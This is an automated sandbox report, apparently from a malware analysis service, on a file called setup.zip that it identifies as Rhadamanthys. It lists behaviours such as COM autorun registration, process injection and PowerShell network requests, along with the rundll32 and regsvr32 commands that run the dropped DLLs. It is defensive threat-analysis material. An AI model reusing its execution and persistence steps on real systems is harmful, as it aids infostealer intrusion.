Analysis Overview
SHA256
d7587071279ebaca1fe3fc2866c62947fe6c8df9862d1c434a99b4a5fb47a611
Threat Level: Known bad
The file setup.zip was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Rhadamanthys
Blocklisted process makes network request
Registers COM server for autorun
Enumerates connected drives
Suspicious use of SetThreadContext
Drops file in Windows directory
Loads dropped DLL
Executes dropped EXE
Unsigned PE
Program crash
Modifies registry class
Checks processor information in registry
Suspicious behavior: AddClipboardFormatListener
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of UnmapMainImage
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-29 12:34
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-29 12:34
Reported
2024-03-29 12:44
Platform
win11-20240221-en
Max time kernel
439s
Max time network
446s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\authz\authz.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral13
Detonation Overview
Submitted
2024-03-29 12:34
Reported
2024-03-29 12:35
Platform
win11-20240221-en
Max time kernel
0s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ninput\ninput.dll,#1
Network
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-29 12:34
Reported
2024-03-29 12:34
Platform
win11-20240214-en
Max time kernel
0s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\authz\FXSST.dll,#1
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-03-29 12:34
Reported
2024-03-29 12:44
Platform
win11-20240221-en
Max time kernel
456s
Max time network
457s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\authz\dcntel.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 52.111.227.11:443 | tcp |
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-03-29 12:34
Reported
2024-03-29 12:34
Platform
win11-20240221-en
Max time kernel
0s
Max time network
12s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\mf\wevtsvc.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-03-29 12:34
Reported
2024-03-29 12:44
Platform
win11-20240214-en
Max time kernel
453s
Max time network
459s
Command Line
Signatures
Registers COM server for autorun
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{063B79F5-7539-11D2-9773-00A0C9B4D50C}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{063B79F6-7539-11D2-9773-00A0C9B4D50C}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A9397D66-3ED3-11D1-8D99-00C04FC2E0C7}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{819469D2-D0CF-11d1-8E0B-00C04FC2E0C7}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{063B79F5-7539-11D2-9773-00A0C9B4D50C} | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataReg\CLSID | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataDispenser.1\ = "Microsoft COM+ Services Meta Data" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataDispenser\ = "Microsoft COM+ Services Meta Data" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataDispenser\CLSID\ = "{063B79F5-7539-11D2-9773-00A0C9B4D50C}" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataReg | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{063B79F6-7539-11D2-9773-00A0C9B4D50C}\ProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A9397D66-3ED3-11D1-8D99-00C04FC2E0C7} | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{819469D2-D0CF-11d1-8E0B-00C04FC2E0C7}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataDispenser.1 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataDispenser.1\CLSID\ = "{063B79F5-7539-11D2-9773-00A0C9B4D50C}" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataReg.1\CLSID | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataReg\ = "Microsoft COM+ Services Meta Data" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataReg\CurVer | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A9397D66-3ED3-11D1-8D99-00C04FC2E0C7}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataDispenser.1\CLSID | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataReg.1\ = "Microsoft COM+ Services Meta Data" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataReg.1\CLSID\ = "{063B79F6-7539-11D2-9773-00A0C9B4D50C}" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataDispenser | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{063B79F5-7539-11D2-9773-00A0C9B4D50C}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataReg.1 | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{063B79F6-7539-11D2-9773-00A0C9B4D50C} | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{063B79F6-7539-11D2-9773-00A0C9B4D50C}\VersionIndependentProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{063B79F6-7539-11D2-9773-00A0C9B4D50C}\NotInsertable | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{063B79F6-7539-11D2-9773-00A0C9B4D50C}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{063B79F5-7539-11D2-9773-00A0C9B4D50C}\ProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{063B79F5-7539-11D2-9773-00A0C9B4D50C}\VersionIndependentProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataReg\CLSID\ = "{063B79F6-7539-11D2-9773-00A0C9B4D50C}" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataDispenser\CLSID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{063B79F5-7539-11D2-9773-00A0C9B4D50C}\NotInsertable | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataReg\CurVer\ = "ComPlusMetaDataServices.ServicesMetaDataReg.1" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataDispenser\CurVer | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ComPlusMetaDataServices.ServicesMetaDataDispenser\CurVer\ = "ComPlusMetaDataServices.ServicesMetaDataDispenser.1" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{819469D2-D0CF-11d1-8E0B-00C04FC2E0C7} | C:\Windows\system32\regsvr32.exe | N/A |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\authz\clbcatq.dll
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-03-29 12:34
Reported
2024-03-29 12:35
Platform
win11-20240221-en
Max time kernel
46s
Max time network
13s
Command Line
Signatures
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\mf\Licenses\Volume\Professional\license.rtf" /o ""
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.32.109.52.in-addr.arpa | udp |
Files
memory/5104-0-0x00007FFC4A150000-0x00007FFC4A160000-memory.dmp
memory/5104-2-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp
memory/5104-1-0x00007FFC4A150000-0x00007FFC4A160000-memory.dmp
memory/5104-4-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp
memory/5104-3-0x00007FFC4A150000-0x00007FFC4A160000-memory.dmp
memory/5104-5-0x00007FFC4A150000-0x00007FFC4A160000-memory.dmp
memory/5104-6-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp
memory/5104-7-0x00007FFC4A150000-0x00007FFC4A160000-memory.dmp
memory/5104-8-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp
memory/5104-9-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp
memory/5104-11-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp
memory/5104-10-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp
memory/5104-12-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp
memory/5104-14-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp
memory/5104-13-0x00007FFC47AA0000-0x00007FFC47AB0000-memory.dmp
memory/5104-15-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp
memory/5104-18-0x00007FFC88A10000-0x00007FFC88ACD000-memory.dmp
memory/5104-17-0x00007FFC47AA0000-0x00007FFC47AB0000-memory.dmp
memory/5104-16-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp
memory/5104-19-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp
memory/5104-28-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp
memory/5104-29-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp
memory/5104-30-0x00007FFC8A0C0000-0x00007FFC8A2C9000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-03-29 12:34
Reported
2024-03-29 12:35
Platform
win11-20240221-en
Max time kernel
31s
Max time network
14s
Command Line
Signatures
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\mf\Licenses\_Default\Professional\license.rtf" /o ""
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 18.89.109.52.in-addr.arpa | udp |
Files
memory/3664-1-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
memory/3664-0-0x00007FFCDC470000-0x00007FFCDC480000-memory.dmp
memory/3664-2-0x00007FFCDC470000-0x00007FFCDC480000-memory.dmp
memory/3664-3-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
memory/3664-4-0x00007FFCDC470000-0x00007FFCDC480000-memory.dmp
memory/3664-5-0x00007FFCDC470000-0x00007FFCDC480000-memory.dmp
memory/3664-6-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
memory/3664-7-0x00007FFCDC470000-0x00007FFCDC480000-memory.dmp
memory/3664-8-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
memory/3664-9-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
memory/3664-10-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
memory/3664-11-0x00007FFCDA250000-0x00007FFCDA260000-memory.dmp
memory/3664-12-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
memory/3664-13-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
memory/3664-15-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
memory/3664-16-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
memory/3664-14-0x00007FFCDA250000-0x00007FFCDA260000-memory.dmp
memory/3664-17-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
memory/3664-18-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
memory/3664-19-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
memory/3664-20-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
memory/3664-21-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
memory/3664-22-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
memory/3664-23-0x00007FFD1B4A0000-0x00007FFD1B55D000-memory.dmp
memory/3664-24-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
memory/3664-33-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
memory/3664-34-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
memory/3664-35-0x00007FFD1C3E0000-0x00007FFD1C5E9000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-03-29 12:34
Reported
2024-03-29 12:44
Platform
win11-20240221-en
Max time kernel
451s
Max time network
452s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\mf\mf.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-03-29 12:34
Reported
2024-03-29 12:35
Platform
win11-20240214-en
Max time kernel
7s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ninput\mlang.dll,#1
Network
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-03-29 12:34
Reported
2024-03-29 12:44
Platform
win11-20240221-en
Max time kernel
457s
Max time network
459s
Command Line
Signatures
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\mf\Licenses\OEM\Professional\license.rtf" /o ""
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.32.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
Files
memory/468-0-0x00007FF9D8290000-0x00007FF9D82A0000-memory.dmp
memory/468-4-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-2-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-1-0x00007FF9D8290000-0x00007FF9D82A0000-memory.dmp
memory/468-3-0x00007FF9D8290000-0x00007FF9D82A0000-memory.dmp
memory/468-5-0x00007FF9D8290000-0x00007FF9D82A0000-memory.dmp
memory/468-6-0x00007FF9D8290000-0x00007FF9D82A0000-memory.dmp
memory/468-7-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-8-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-10-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-9-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-11-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-12-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-13-0x00007FF9D5B30000-0x00007FF9D5B40000-memory.dmp
memory/468-14-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-15-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-16-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-17-0x00007FF9D5B30000-0x00007FF9D5B40000-memory.dmp
memory/468-18-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-19-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-20-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-21-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-22-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-23-0x00007FFA17A10000-0x00007FFA17ACD000-memory.dmp
memory/468-25-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-33-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-34-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-35-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-58-0x00007FF9D8290000-0x00007FF9D82A0000-memory.dmp
memory/468-59-0x00007FF9D8290000-0x00007FF9D82A0000-memory.dmp
memory/468-60-0x00007FF9D8290000-0x00007FF9D82A0000-memory.dmp
memory/468-61-0x00007FF9D8290000-0x00007FF9D82A0000-memory.dmp
memory/468-62-0x00007FFA18200000-0x00007FFA18409000-memory.dmp
memory/468-63-0x00007FFA17A10000-0x00007FFA17ACD000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-03-29 12:34
Reported
2024-03-29 12:44
Platform
win11-20240221-en
Max time kernel
436s
Max time network
446s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\mf\mspatchc.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral11
Detonation Overview
Submitted
2024-03-29 12:34
Reported
2024-03-29 12:34
Platform
win11-20240221-en
Max time kernel
2s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ninput\lsasrv.dll,#1
Network
Files
Analysis: behavioral14
Detonation Overview
Submitted
2024-03-29 12:34
Reported
2024-03-29 12:44
Platform
win11-20240319-en
Max time kernel
442s
Max time network
452s
Command Line
Signatures
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2360 created 2892 | N/A | C:\Windows\SysWOW64\explorer.exe | C:\Windows\system32\sihost.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
